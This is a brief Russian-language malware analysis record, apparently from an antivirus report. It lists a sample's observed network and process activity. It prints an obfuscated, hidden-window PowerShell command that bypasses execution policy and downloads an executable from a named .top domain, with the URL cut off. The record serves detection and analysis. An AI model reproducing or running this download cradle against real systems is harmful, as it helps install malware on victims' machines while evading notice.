Техническая информация
- http://zussipussicscds.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOWer^SHeLL.E^x^E -ex^e^C^u^TIOnPoL^i^cy B^Y^P^ASS^ -NOProfi^LE -wI^NDowS^TyLE^ ^h^I^DdE^N ^(N^Ew-^o^B^jEcT syS^T^eM.Net^.webc^l^IeN^t)^.D^o^w^NloaDfI^LE^('http://zussipussicsc...
- DNS ASK zu####ussicscds.top
- '<SYSTEM32>\cmd.exe' /C "pOWer^SHeLL.E^x^E -ex^e^C^u^TIOnPoL^i^cy B^Y^P^ASS^ -NOProfi^LE -wI^NDowS^TyLE^ ^h^I^DdE^N ^(N^Ew-^o^B^jEcT syS^T^eM.Net^.webc^l^IeN^t)^.D^o^w^NloaDfI^LE^('http://zussipussicsc...' (со скрытым окном)